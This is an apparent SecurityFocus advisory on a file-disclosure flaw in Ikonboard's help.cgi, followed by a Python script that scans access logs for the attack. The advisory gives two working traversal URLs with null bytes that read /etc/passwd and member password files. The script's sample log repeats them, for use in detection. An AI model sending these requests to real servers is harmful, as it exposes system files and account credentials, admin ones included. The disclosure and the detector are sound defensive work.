Ikonboard Remote File Disclosure Vulnerability

Example:

http://www.example.com/cgi-bin/ikonboard/help.cgi?helpon=../../../../../etc/passwd%00

will disclose /etc/passwd, if readable by the webserver.

http://www.example.com/cgi-bin/ikonboard/help.cgi?helpon=../members/[member].cgi%00

discloses the Ikonboard account password for [member], including admin accounts.
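
Added example (not part of the original advisory, and not Ikonboard code): a detection check that scans web server access logs for help.cgi requests whose helpon value, after percent-decoding, contains the traversal sequence, a path separator or the NUL byte shown in the URLs above. The log lines, the member name "someuser" and the pattern for a normal help topic name are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, unquote_to_bytes

# Constructed sample access-log lines (Common Log Format); not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /cgi-bin/ikonboard/help.cgi?helpon=posting HTTP/1.0" 200 2311
192.0.2.44 - - [01/Jan/2010:10:00:05 +0000] "GET /cgi-bin/ikonboard/help.cgi?helpon=../../../../../etc/passwd%00 HTTP/1.0" 200 1502
192.0.2.44 - - [01/Jan/2010:10:00:09 +0000] "GET /cgi-bin/ikonboard/help.cgi?helpon=%2e%2e%2fmembers%2fsomeuser.cgi%2500 HTTP/1.0" 200 412
192.0.2.77 - - [01/Jan/2010:10:01:00 +0000] "GET /cgi-bin/ikonboard/topic.cgi?forum=1&topic=..%2f HTTP/1.0" 200 900
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate help topic is a short alphanumeric name.
SAFE_TOPIC = re.compile(rb"[A-Za-z0-9_-]+")

def decode_fully(raw, rounds=3):
    """Percent-decode repeatedly so double-encoded values are also caught."""
    data = raw.encode("latin-1", "replace")
    for _ in range(rounds):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
    return data

def classify(value):
    """Return the reasons a decoded helpon value looks like file disclosure."""
    reasons = []
    if b"\x00" in value:
        reasons.append("nul-byte")        # truncates the appended file suffix
    if b".." in value:
        reasons.append("dot-dot")         # climbs out of the help directory
    if b"/" in value or b"\\" in value:
        reasons.append("path-separator")
    if not reasons and not SAFE_TOPIC.fullmatch(value):
        reasons.append("unexpected-characters")
    return reasons

def scan(log_text):
    """Return (client, raw helpon value, reasons) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m or not urlsplit(m.group(2)).path.endswith("/help.cgi"):
            continue
        for pair in re.split(r"[&;]", urlsplit(m.group(2)).query):
            name, _, raw = pair.partition("=")
            reasons = classify(decode_fully(raw)) if name == "helpon" else []
            if reasons:
                hits.append((m.group(1), raw, reasons))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A 200 response on a flagged request is worth following up, since the advisory's second URL returns member credentials.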


 

Copyright 2010, SecurityFocus